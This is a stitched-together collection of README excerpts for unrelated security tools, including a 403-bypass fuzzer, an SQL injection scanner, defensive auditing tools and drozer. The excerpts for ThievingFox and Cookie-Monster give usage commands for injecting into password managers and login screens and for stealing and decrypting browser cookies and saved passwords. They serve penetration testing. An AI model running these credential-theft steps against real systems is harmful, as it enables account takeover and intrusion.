It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.
I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.
You can now feed it raw HTTP requests that you save to a file from Burp.
usage: bypassfuzzer.py -h
Simply paste the request into a file and run the script!
- It will parse and use cookies
& headers
from the request. - Easiest way to authenticate for your requests
python3 bypassfuzzer.py -r request.txt
Specify a URL
python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html
Specify cookies to use in requests:
some examples:
--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"
Specify a method/verb and body data to send
bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah¶m2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah¶m2=blah2"
Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>
Specify -H "header: value"
for each additional header you'd like to add:
bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"
Based on response code and length. If it sees a response 8 times or more it will automatically mute it.
Repeats are changeable in the code until I add an option to specify it in flag
NOTE: Can't be used simultaneously with -hc
or -hl
(yet)
# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart
Useful if you wanna proxy through Burp
bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080
# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers
# Skip sending path normailization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls
Provide comma delimited lists without spaces. Examples:
# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400
# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638
SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
bash pip3 install sqlmc
Run sqlmc
with the following command-line arguments:
-u, --url
: The URL to scan (required)-d, --depth
: The depth to scan (required)-o, --output
: The output file to save the resultsExample usage:
sqlmc -u http://example.com -d 2
Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.
The tool will then perform the scan and display the results.
This project is licensed under the GNU Affero General Public License v3.0.
HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. Hardening Meter supports all Linux distributions and machine-readable output, the results can be printed to the screen a table format or be exported to a csv. (For more information see Documentation.md file)
Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.
python3 HardeningMeter.py -f /bin/cp -s
Before installing HardeningMeter, make sure your machine has the following: 1. readelf
and file
commands 2. python version 3 3. pip 4. tabulate
pip install tabulate
The very latest developments can be obtained via git.
Clone or download the project files (no compilation nor installation is required)
git clone https://github.com/OfriOuzan/HardeningMeter
Specify the files you want to scan, the argument can get more than one file seperated by spaces.
Specify the directory you want to scan, the argument retrieves one directory and scan all ELF files recursively.
Specify whether you want to add external checks (False by default).
Prints according to the order, only those files that are missing security hardening mechanisms and need extra attention.
Specify if you want to scan the system hardening methods.
Specify if you want to save the results to csv file (results are printed as a table to stdout by default).
HardeningMeter's results are printed as a table and consisted of 3 different states: - (X) - This state indicates that the binary hardening mechanism is disabled. - (V) - This state indicates that the binary hardening mechanism is enabled. - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.
When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.
ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.
The accompanying blog post can be found here
Rustup must be installed, follow the instructions available here : https://rustup.rs/
The mingw-w64 package must be installed. On Debian, this can be done using :
apt install mingw-w64
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu
Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin
After adding Mono repositories, Nuget can be installed using apt :
apt install nuget
Finally, python dependancies must be installed :
pip install -r client/requirements.txt
ThievingFox works with python >= 3.11
.
Rustup must be installed, follow the instructions available here : https://rustup.rs/
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc
.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"
Finally, python dependancies must be installed :
pip install -r client/requirements.txt
ThievingFox works with python >= 3.11
NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)
All modules have been tested on the following Windows versions :
Windows Version |
---|
Windows Server 2022 |
Windows Server 2019 |
Windows Server 2016 |
Windows Server 2012R2 |
Windows 10 |
Windows 11 |
[!CAUTION] Modules have not been tested on other version, and are expected to not work.
Application | Injection Method |
---|---|
KeePass.exe | AppDomainManager Injection |
KeePassXC.exe | DLL Proxying |
LogonUI.exe (Windows Login Screen) | COM Hijacking |
consent.exe (Windows UAC Popup) | COM Hijacking |
mstsc.exe (Windows default RDP client) | COM Hijacking |
RDCMan.exe (Sysinternals' RDP client) | COM Hijacking |
MobaXTerm.exe (3rd party RDP client) | COM Hijacking |
[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the
cleanup
module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.
ThievingFox contains 3 main modules : poison
, cleanup
and collect
.
For each application specified in the command line parameters, the poison
module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.
To speed up the process of compilation of all libraries, a cache is maintained in client/cache/
.
--mstsc
, --rdcman
, and --mobaxterm
have a specific option, respectively --mstsc-poison-hkcr
, --rdcman-poison-hkcr
, and --mobaxterm-poison-hkcr
. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR
hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU
hive).
--keepass
and --keepassxc
have specific options, --keepass-path
, --keepass-share
, and --keepassxc-path
, --keepassxc-share
, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.
The KeePass modules requires the Visual C++ Redistributable
to be installed on the target.
Multiple applications can be specified at once, or, the --all
flag can be used to target all applications.
[!IMPORTANT] Remember to clean the cache if you ever change the
--tempdir
parameter, since the directory name is embedded inside native DLLs.
$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--ke epassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications
For each application specified in the command line parameters, the cleanup
first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.
For applications that support poisonning of both HKCU
and HKCR
hives, both are cleaned up regardless.
Multiple applications can be specified at once, or, the --all
flag can be used to cleanup all applications.
It does not clean extracted credentials on the remote host.
[!IMPORTANT] If the targeted application is in use while the
cleanup
module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, thecleanup
module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted byThievingFox
are logged.
$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications
For each application specified on the command line parameters, the collect
module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir>
corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/
.
Multiple applications can be specified at once, or, the --all
flag can be used to collect logs from all applications.
$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of th e domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications
Infromations Web Application Security
sudo apt install python3 python3-pip
pip3 install termcolor
pip3 install google
pip3 install optioncomplete
pip3 install bs4
pip3 install prettytable
git clone https://github.com/Matrix07ksa/HackerInfo/
cd HackerInfo
chmod +x HackerInfo
./HackerInfo -h
python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
h ttps://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms _hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finshid]########################
sudo python setup.py install
pip3 install hackinfo
Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>]
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file
Install requirements
pip3 install -r requirements.txt
Base64 encode the webkit masterkey
python3 base64-encode.py "\xec\xfc...."
Decrypt Chrome/Edge Cookies File
python .\decrypt.py "XHh..." --cookies ChromeCookie.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Decrypt Chome/Edge Passwords File
python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd
Ensure Mingw-w64 and make is installed on the linux prior to compiling.
make
to compile exe on windows
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI
Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments
CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.
To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.
bash pip3 install -r requirements.txt
To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.
bash chmod +x clone.sh ./clone.sh
This tool offers a CLI (Command Line Interface). As such, here we review its use:
Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:
Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.
{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}
],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}
Run command
python3 main.py
python3 main.py -p
[+] Running GetFileDownloadUrls.*secrets_ for AWS
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.
python3 main.py -p -jo
reports
βββ json
βββ AWS
βΒ Β βββ 2024-03-04 01:01 AM
βΒ Β βββ cloudtrail-logs-00000000-ffffff--
βΒ Β βββ testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
βΒ Β βββ GetFileDownloadUrls.*secrets_.json
βββ AZURE
βββ 2024-03-04 01:01 AM
βββ logs
βββ cloudgrappler
βββ okta_key.json
python3 main.py -p -sd 2024-02-15 -ed 2024-02-16
python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'
python3 main.py -f new_file.json
Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.
If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.
The simplest way to authenticate with Azure is to first run:
az login
This will open a browser window and prompt you to login to Azure.
AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.
If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! β
What's new? | Why is it useful? |
---|---|
Mistral API Integration | - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case. |
Local Model Support using Ollama | - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app |
Optional LangSmith Integration | - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith. |
Various Bug Fixes and Improvements | - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust. |
What's new? | Why is it useful? |
---|---|
Azure OpenAI Service Integration | - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements. - Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models. |
LangSmith for Azure OpenAI Service | - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios. - User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction. |
Model Selection for OpenAI API | - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview . This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case. |
Docker Container Image | - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform. |
What's new? | Why is it useful? |
---|---|
Custom Scenarios based on ATT&CK Techniques | - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group. - Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture. |
User feedback on generated scenarios | - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks. |
Improved error handling for missing API keys | - Improved user experience. |
Replaced Streamlit st.spinner widgets with new st.status widget | - Provides better visibility into long running processes (i.e. scenario generation). |
Initial release.
langchain
and mitreattack
).enterprise-attack.json
(MITRE ATT&CK dataset in STIX format) and groups.json
.git clone https://github.com/mrwadams/attackgen.git
cd attackgen
pip install -r requirements.txt
docker pull mrwadams/attackgen
If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml
file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example
file in the .streamlit/
directory that you can use as a template for your own secrets.toml file.
If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml
file in place, but you can leave the LANGCHAIN_API_KEY
field empty.
Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/
directory within the repository.
After the data setup, you can run AttackGen with the following command:
streamlit run π_Welcome.py
You can also try the app on Streamlit Community Cloud.
streamlit run π_Welcome.py
docker run -p 8501:8501 mrwadams/attackgen
This command will start the container and map port 8501 (default for Streamlit apps) from the container to your host machine. 2. Open your web browser and navigate to http://localhost:8501
. 3. Use the app to generate standard or custom incident response scenarios (see below for details).
Threat Group Scenarios
page..streamlit/secrets.toml
file.Custom Scenario
page..streamlit/secrets.toml
file.Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.
I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.
This project is licensed under GNU GPLv3.
ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.
~ Hilali Abdel
USAGE
python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]
[Add new Device]
python3 smartthings.py -a 192.168.1.1
python3 smarthings.py -s --type TPLINK
python3 smartthings.py -s --firmware TP-Link Archer C7v2
Search for CVE and Poc [ firmware and device type]
Scan device for open upnp ports
python3 smartthings.py -s --scan upnp --id
get data from mqtt 'subscribe'
python3 smartthings.py -s --scan mqtt --id
drozer (formerly Mercury) is the leading security testing framework for Android.
drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).
drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.
drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/
To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.
Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.
Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python setup.py bdist_wheel
sudo pip install dist/drozer-2.x.x-py2-none-any.whl
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make deb
sudo dpkg -i drozer-2.x.x.deb
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make rpm
sudo rpm -I drozer-2.x.x-1.noarch.rpm
NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python.exe setup.py bdist_msi
Run dist/drozer-2.x.x.win-x.msi
Drozer can be installed using Android Debug Bridge (adb).
Download the latest Drozer Agent here.
$ adb install drozer-agent-2.x.x.apk
You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.
We will use the server embedded in the drozer Agent to do this.
If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:
$ adb forward tcp:31415 tcp:31415
Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.
Then, on your PC, connect using the drozer Console:
On Linux:
$ drozer console connect
On Windows:
> drozer.bat console connect
If using a real device, the IP address of the device on the network must be specified:
On Linux:
$ drozer console connect --server 192.168.0.10
On Windows:
> drozer.bat console connect --server 192.168.0.10
You should be presented with a drozer command prompt:
selecting f75640f67144d9a3 (unknown sdk 4.1.1)
dz>
The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.
You are now ready to start exploring the device.
Command | Description |
---|---|
run | Executes a drozer module |
list | Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run. |
shell | Start an interactive Linux shell on the device, in the context of the Agent process. |
cd | Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module. |
clean | Remove temporary files stored by drozer on the Android device. |
contributors | Displays a list of people who have contributed to the drozer framework and modules in use on your system. |
echo | Print text to the console. |
exit | Terminate the drozer session. |
help | Display help about a particular command or module. |
load | Load a file containing drozer commands, and execute them in sequence. |
module | Find and install additional drozer modules from the Internet. |
permissions | Display a list of the permissions granted to the drozer Agent. |
set | Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer. |
unset | Remove a named variable that drozer passes to any Linux shells that it spawns. |
drozer is released under a 3-clause BSD License. See LICENSE for full details.
drozer is Open Source software, made great by contributions from the community.
Bug reports, feature requests, comments and questions can be submitted here.
